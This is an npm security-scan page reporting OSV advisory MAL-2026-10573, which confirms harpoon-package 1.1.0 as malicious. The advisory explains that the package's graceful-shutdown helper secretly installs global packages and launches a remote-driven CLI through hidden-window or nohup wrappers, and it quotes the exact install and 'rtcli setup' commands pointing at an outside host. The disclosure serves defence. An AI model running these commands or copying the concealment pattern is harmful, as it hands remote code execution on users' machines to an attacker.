OSV Malicious Advisory
scanned 4h ago · by OpenSSF/OSVOpenSSF/OSV advisory MAL-2026-10573 confirms this npm version as malicious. The exported registerGracefulShutdown() API — advertised in the README as a small server-helper for graceful shutdown, health, and tick profiling — unconditionally invokes an internal installRequiredPackages() routine that runs `npm install -g rt-svc-9k2 ws msgpackr` and then executes `rtcli setup --api-base https://api.runtime-ops.com --download-key downloadky-fuji`...
Advisory
MAL-2026-10573
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in harpoon-package (npm)
Details
The exported registerGracefulShutdown() API — advertised in the README as a small server-helper for graceful shutdown, health, and tick profiling — unconditionally invokes an internal installRequiredPackages() routine that runs `npm install -g rt-svc-9k2 ws msgpackr` and then executes `rtcli setup --api-base https://api.runtime-ops.com --download-key downloadky-fuji`. The follow-on invocation is deliberately concealed: on Windows it is launched via `powershell Start-Process -WindowStyle Hidden`, and on Linux/macOS via `nohup rtcli... > /dev/null 2>&1 &`, detaching from the parent and suppressing output. Neither the global install nor the remote-controlled CLI execution is disclosed in the README. The effect is that any consumer application that calls the advertised graceful-shutdown API mutates global npm state on the host and hands arbitrary code execution to whoever controls api.runtime-ops.com via the third-party `rt-svc-9k2` CLI driven by an author-supplied download key. The divergence between advertised purpose (shutdown handler) and actual behavior (global installer + hidden detached execution of a remote-driven CLI), combined with hidden-window/detached-execution wrappers, is characteristic of a covert install-time remote code execution channel smuggled into a plausibly named helper package.
Decision reason
OpenSSF Malicious Packages via OSV confirms harpoon-package@1.1.0 as malicious (MAL-2026-10573): Malicious code in harpoon-package (npm)
References
Source & flagged code
0 flaggedNo flagged code excerpts are attached to this scan.
Findings
1 High
HighOsv Malicious Advisory